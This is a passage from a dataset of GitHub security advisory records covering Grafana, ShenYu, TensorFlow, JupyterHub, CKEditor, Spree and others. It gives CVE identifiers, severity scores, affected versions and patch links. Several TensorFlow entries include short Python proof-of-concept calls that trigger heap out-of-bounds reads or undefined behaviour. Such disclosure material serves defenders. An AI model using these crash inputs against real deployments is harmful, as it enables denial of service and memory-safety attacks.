'https://github.com/grafana/grafana/commit/fb85ed691290d211a5baa44d9a641ab137f0de88'}, {'type': 'PACKAGE', 'url': 'https://github.com/grafana/grafana'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211125-0003/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T18:18:08Z', 'nvd_published_at': '2021-11-03T18:15:00Z'}" +1.4.0,GHSA-vpfp-5gwq-g533,2023-09-05T22:18:19Z,2021-11-17T23:15:30Z,,['CVE-2021-37580'],Improper Authentication in Apache ShenYu Admin,A flaw was found in Apache ShenYu Admin. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. This issue affected Apache ShenYu 2.3.0 and 2.4.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.shenyu:shenyu-admin'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37580'}, {'type': 'WEB', 'url': 'https://github.com/apache/shenyu/commit/f78adb26926ba53b4ec5c21f2cf7e931461d601d'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/shenyu'}, {'type': 'WEB', 'url': 'https://github.com/apache/shenyu/releases/tag/v2.4.1'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/o15j25qwtpcw62k48xw1tnv48skh3zgb'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/16/1'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T22:31:03Z', 'nvd_published_at': '2021-11-16T10:15:00Z'}" +1.4.0,GHSA-cvgx-3v3q-m36c,2021-11-08T22:32:45Z,2021-11-10T19:01:03Z,,['CVE-2021-41211'],Heap OOB in shape inference for `QuantizeV2`,"### Impact +The [shape inference code for `QuantizeV2`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/framework/common_shape_fns.cc#L2509-L2530) can trigger a read outside of bounds of heap allocated array: + +```python +import tensorflow as tf + +@tf.function +def test(): + data=tf.raw_ops.QuantizeV2( + input=[1.0,1.0], + min_range=[1.0,10.0], + max_range=[1.0,10.0], + T=tf.qint32, + mode='MIN_COMBINED', + round_mode='HALF_TO_EVEN', + narrow_range=False, + axis=-100, + ensure_minimum_range=10) + return data + +test() +``` + +This occurs whenever `axis` is a negative value less than `-1`. In this case, we are accessing data before the start of a heap buffer: + +```cc +int axis = -1; +Status s = c->GetAttr(""axis"", &axis); +if (!s.ok() && s.code() != error::NOT_FOUND) { + return s; +} +... +if (axis != -1) { + ... + TF_RETURN_IF_ERROR( + c->Merge(c->Dim(minmax, 0), c->Dim(input, axis), &depth)); +} +``` + +The code allows `axis` to be an optional argument (`s` would contain an `error::NOT_FOUND` error code). Otherwise, it assumes that `axis` is a valid index into the dimensions of the `input` tensor. If `axis` is less than `-1` then this results in a heap OOB read. + +### Patches +We have patched the issue in GitHub commit [a0d64445116c43cf46a5666bd4eee28e7a82f244](https://github.com/tensorflow/tensorflow/commit/a0d64445116c43cf46a5666bd4eee28e7a82f244). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, as this version is the only one that is also affected. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}], 'versions': ['2.6.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}], 'versions': ['2.6.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}], 'versions': ['2.6.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cvgx-3v3q-m36c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41211'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/a0d64445116c43cf46a5666bd4eee28e7a82f244'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:32:45Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}" +1.4.0,GHSA-786j-5qwq-r36x,2021-11-08T22:45:03Z,2021-11-10T19:12:14Z,,['CVE-2021-41204'],Segfault while copying constant resource tensor,"### Impact +During TensorFlow's Grappler optimizer phase, constant folding might attempt to deep copy a resource tensor. This results in a segfault, as these tensors are supposed to not change. + +### Patches +We have patched the issue in GitHub commit [7731e8dfbe4a56773be5dc94d631611211156659](https://github.com/tensorflow/tensorflow/commit/7731e8dfbe4a56773be5dc94d631611211156659). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-786j-5qwq-r36x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41204'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/7731e8dfbe4a56773be5dc94d631611211156659'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-824'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:45:03Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}" +1.4.0,GHSA-4f99-p9c2-3j8x,2021-11-08T22:08:27Z,2021-11-10T18:51:51Z,,['CVE-2021-41219'],Undefined behavior via `nullptr` reference binding in sparse matrix multiplication,"### Impact +The [code for sparse matrix multiplication](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/sparse_matmul_op.cc#L954-L1086) is vulnerable to undefined behavior via binding a reference to `nullptr`: + +```python +import tensorflow as tf + +tf.raw_ops.SparseMatMul( + a=[[1.0,1.0,1.0]], + b=[[],[],[]], + transpose_a=False, + transpose_b=False, + a_is_sparse=False, + b_is_sparse=True) +``` + +This occurs whenever the dimensions of `a` or `b` are 0 or less. In the case on one of these is 0, an empty output tensor should be allocated (to conserve the invariant that output tensors are always allocated when the operation is successful) but nothing should be written to it (that is, we should return early from the kernel implementation). Otherwise, attempts to write to this empty tensor would result in heap OOB access. + +### Patches +We have patched the issue in GitHub commit [e6cf28c72ba2eb949ca950d834dd6d66bb01cfae](https://github.com/tensorflow/tensorflow/commit/e6cf28c72ba2eb949ca950d834dd6d66bb01cfae). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4f99-p9c2-3j8x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41219'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e6cf28c72ba2eb949ca950d834dd6d66bb01cfae'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125', 'CWE-824'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:08:27Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}" +1.4.0,GHSA-mc8v-mgrf-8f4m,2021-12-13T13:12:02Z,2021-11-18T16:13:08Z,,['CVE-2021-41190'],Clarify Content-Type handling,"### Impact +In the OCI Distribution Specification version 1.0.0 and prior, the Content-Type header alone was used to determine the type of document during push and pull operations. Documents that contain both “manifests” and “layers” fields could be interpreted as either a manifest or an index in the absence of an accompanying Content-Type header. If a Content-Type header changed between two pulls of the same digest, a client may interpret the resulting content differently. + +### Patches +The OCI Distribution Specification will be updated to require that a `mediaType` value present in a manifest or index match the Content-Type header used during the push and pull operations. + +### Workarounds +Clients pulling from a registry may distrust the Content-Type header and reject an ambiguous document that contains both “manifests” and “layers” fields or “manifests” and “config” fields. + +### References +https://github.com/opencontainers/image-spec/security/advisories/GHSA-77vh-xpmg-72qh + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in https://github.com/opencontainers/distribution-spec/ +* Email us at security@opencontainers.org +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/opencontainers/distribution-spec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/opencontainers/distribution-spec/security/advisories/GHSA-mc8v-mgrf-8f4m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41190'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/distribution-spec/commit/ac28cac0557bcd3084714ab09f9f2356fe504923'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencontainers/distribution-spec'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3TUZNDAH2B26VPBK342UC3BHZNLBUXGX/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4334HT7AZPLWNYHW4ARU6JBUF3VZJPZN/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/A2RRFNTMFYKOTRKD37F5ANMCIO3GGJML/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DX63GRWFEI5RVMYV6XLMCG4OHPWZML27/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RZTO6N55WHKHIZI4IMLY2QFBPMVTAERM/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SQBCYJUIM5GVCMFUPRWKRZNXMMI5EFA4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T4OJ764CKKCWCVONHD4YXTGR7HZ7LRUV/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YIGVQWOA5XXCQXEOOKZX4CDAGLBDRPRX/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/10'}]","{'cwe_ids': ['CWE-843'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T23:13:37Z', 'nvd_published_at': '2021-11-17T20:15:00Z'}" +1.4.0,GHSA-cw7p-q79f-m2v7,2021-11-04T17:49:19Z,2021-11-08T18:02:37Z,,['CVE-2021-41247'],incomplete JupyterHub logout with simultaneous JupyterLab sessions,"### Impact + +Users of JupyterLab with JupyterHub who have multiple JupyterLab tabs open in the same browser session, may see incomplete logout from the single-user server, as fresh credentials (for the single-user server only, not the Hub) reinstated after logout, if another active JupyterLab session is open while the logout takes place. + +### Patches + +Upgrade to JupyterHub 1.5. For distributed deployments, it is jupyterhub in the _user_ environment that needs patching. There are no patches necessary in the Hub environment. + +### Workarounds + +The only workaround is to make sure that only one JupyterLab tab is open when you log out.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'jupyterhub'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jupyterhub/jupyterhub/security/advisories/GHSA-cw7p-q79f-m2v7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41247'}, {'type': 'WEB', 'url': 'https://github.com/jupyterhub/jupyterhub/commit/5ac9e7f73a6e1020ffddc40321fc53336829fe27'}, {'type': 'PACKAGE', 'url': 'https://github.com/jupyterhub/jupyterhub'}]","{'cwe_ids': ['CWE-613'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T17:49:19Z', 'nvd_published_at': '2021-11-04T18:15:00Z'}" +1.4.0,GHSA-5mxh-2qfv-4g7j,2022-04-05T19:29:23Z,2021-11-10T20:15:06Z,,['CVE-2021-3910'],NUL character in ROA causes OctoRPKI to crash,"OctoRPKI crashes when encountering a repository that returns an invalid ROA (just an encoded `NUL` (`\0`) character). + +## Patches + +## For more information +If you have any questions or comments about this advisory email us at security@cloudflare.com","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/cfrpki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-5mxh-2qfv-4g7j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3910'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/commit/76f0f7a98da001fa04e5bc0407c6702f91096bfa'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/cfrpki'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/releases/tag/v1.4.0'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0251'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5041'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:17:39Z', 'nvd_published_at': '2021-11-11T22:15:00Z'}" +1.4.0,GHSA-pvmx-g8h5-cprj,2022-02-08T20:39:22Z,2021-11-17T21:55:10Z,,['CVE-2021-41164'],Advanced Content Filter (ACF) vulnerability allowing to execute JavaScript code using malformed HTML,"### Affected packages +The vulnerability has been discovered in the Advanced Content Filter (ACF) module and may affect all plugins used by CKEditor 4. + +### Impact +A potential vulnerability has been discovered in CKEditor 4 Advanced Content Filter (ACF) core module. The vulnerability allowed to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. It affects all users using the CKEditor 4 at version < 4.17.0. + +### Patches +The problem has been recognized and patched. The fix will be available in version 4.17.0. + +### For more information +Email us at security@cksource.com if you have any questions or comments about this advisory. + +### Acknowledgements +The CKEditor 4 team would like to thank Maurice Dauer ([laytonctf](https://twitter.com/laytonctf)) for recognizing and reporting this vulnerability. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'ckeditor4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.17.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-pvmx-g8h5-cprj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41164'}, {'type': 'PACKAGE', 'url': 'https://github.com/ckeditor/ckeditor4'}, {'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor4/blob/major/CHANGES.md#ckeditor-417'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VR76VBN5GW5QUBJFHVXRX36UZ6YTCMW6/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WOZGMCYDB2OKKULFXZKM6V7JJW4ZZHJP/'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2021-011'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T19:56:22Z', 'nvd_published_at': '2021-11-17T19:15:00Z'}" +1.4.0,GHSA-gpqc-4pp7-5954,2023-05-26T15:06:11Z,2021-11-18T20:15:35Z,,[],Authentication Bypass by CSRF Weakness,"### Impact + +CSRF vulnerability that allows user account takeover. + +All applications using any version of the frontend component of `spree_auth_devise` are affected if `protect_from_forgery` method is both: + +* Executed whether as: + * A before_action callback (the default) + * A prepend_before_action (option prepend: true given) before the :load_object hook in Spree::UserController (most likely order to find). +* Configured to use :null_session or :reset_session strategies (:null_session is the default in case the no strategy is given, but rails --new generated skeleton use :exception). + +That means that applications that haven't been configured differently from what it's generated with Rails aren't affected. + +Thanks @waiting-for-dev for reporting and providing a patch 👏 + +### Patches + +Spree 4.3 users should update to spree_auth_devise 4.4.1 +Spree 4.2 users should update to spree_auth_devise 4.2.1 +Spree 4.1 users should update to spree_auth_devise 4.1.1 +Older Spree version users should update to spree_auth_devise 4.0.1 + +### Workarounds + +If possible, change your strategy to :exception: + +```ruby +class ApplicationController < ActionController::Base + protect_from_forgery with: :exception +end +``` + +Add the following to`config/application.rb `to at least run the `:exception` strategy on the affected controller: + +```ruby +config.after_initialize do + Spree::UsersController.protect_from_forgery with: :exception +end +``` + +### References +https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2 +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'spree_auth_devise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2'}, {'type': 'WEB', 'url': 'https://github.com/spree/spree_auth_devise/security/advisories/GHSA-gpqc-4pp7-5954'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth_devise/CVE-2021-41275.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/spree/spree_auth_devise'}]","{'cwe_ids': ['CWE-352'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T21:45:42Z', 'nvd_published_at': None}" +1.4.0,GHSA-r64m-qchj-hrjp,2021-11-24T19:58:48Z,2021-11-24T20:05:19Z,,[],Webcache Poisoning in shopware/platform and shopware/core,"### Impact +Webcache Poisoning via X-Forwarded-Prefix and sub-request + +### Patches +We recommend updating to the current version 6.4.6.1. You can get the update to 6.4.6.1 regularly via the Auto-Updater or directly via the download overview. + +https://www.shopware.com/en/download/#shopware-6 + +Workarounds +For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. + +https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659 +",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.6.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.6.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.6.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.6.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-r64m-qchj-hrjp'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/commit/9062f15450d183f2c666664841efd4f5ef25e0f3'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/platform'}]","{'cwe_ids': ['CWE-444'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T19:58:48Z', 'nvd_published_at': None}" +1.4.0,GHSA-57wx-m983-2f88,2021-11-10T18:35:40Z,2021-11-10T19:37:56Z,,['CVE-2021-41208'],Incomplete validation in boosted trees code,"### Impact +The [code for boosted trees in TensorFlow](https://github.com/tensorflow/tensorflow/blob/e0b6e58c328059829c3eb968136f17aa72b6c876/tensorflow/core/kernels/boosted_trees/stats_ops.cc) is still missing validation. As a result, attackers can trigger denial of service (via dereferencing `nullptr`s or via `CHECK`-failures) as well as abuse undefined behavior (binding references to `nullptr`s). An attacker can also read and write from heap buffers, depending on the API that gets used and the arguments that are passed to the call. + +**Note**: Given that the boosted trees implementation in TensorFlow is unmaintained, it is recommend to no longer use these APIs. Instead, please use the downstream [TensorFlow Decision Forests](https://github.com/tensorflow/decision-forests) project which is newer and supports more features. We will deprecate TensorFlow's boosted trees APIs in subsequent releases. + +### Patches +We have patched the issue in GitHub commit [5c8c9a8bfe750f9743d0c859bae112060b216f5c](https://github.com/tensorflow/tensorflow/commit/5c8c9a8bfe750f9743d0c859bae112060b216f5c). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-57wx-m983-2f88'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41208'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/5c8c9a8bfe750f9743d0c859bae112060b216f5c'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-476', 'CWE-824'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:38:32Z', 'nvd_published_at': '2021-11-05T22:15:00Z'}" +1.4.0,GHSA-m342-ff57-4jcc,2021-11-08T22:34:11Z,2021-11-10T19:01:44Z,,['CVE-2021-41210'],Heap OOB read in `tf.raw_ops.SparseCountSparseOutput`,"### Impact +The [shape inference functions for `SparseCountSparseOutput`](https://github.com/tensorflow/tensorflow/blob/e0b6e58c328059829c3eb968136f17aa72b6c876/tensorflow/core/ops/count_ops.cc#L43-L50) can trigger a read outside of bounds of heap allocated array: + +```python +import tensorflow as tf + +@tf.function +def func(): + return 